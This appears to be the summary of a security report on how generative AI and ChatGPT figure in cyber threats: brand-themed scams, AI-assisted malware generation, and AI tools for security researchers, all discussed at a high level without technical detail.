Insights Into the AI-Based Cyberthreat Landscape
Large language models (LLMs) and generative AI are significantly increasing their abilities and global utilization. While these tools offer undeniable utility to the general public, they also present potential risks of misuse. Furthermore, bad actors are also actively investigating tools like OpenAI's ChatGPT.
This document describes the following aspects of an AI-based cyber threat landscape:
-
How ChatGPT brand is misused for lures, scams, or other social engineering-related threats
-
How generative AI can be used to generate malware
-
The potential pitfalls and changes it brings for security researchers and attackers
-
How ChatGPT and generative AI can help security researchers in their daily struggles, providing insights, and bringing AI-based assistants to their toolset
Generative AI and other forms of AI are going to play a key role in the cyber threat landscape. We expect that highly believable and multilingual texts misused for phishing and scams will be leveraged at scale, providing better opportunities for more advanced social engineering.
On the other hand, we believe that generative AI as it stands now is unlikely to drastically alter the landscape of malware generation. Although many proofs of the concept exist—mainly from security firms and nefarious actors testing the technology—it's still a complex approach, especially when compared to existing, simpler methods.
Despite the risks, it is important to recognize the value that generative AI brings to the table when used for legitimate purposes. We already see security and AI-based assistant tools with various levels of maturity and specialization emerging on the market.
Given the rapid development of these tools and the widespread availability of open-source versions, we can reasonably anticipate a substantial improvement in their capabilities in the near future.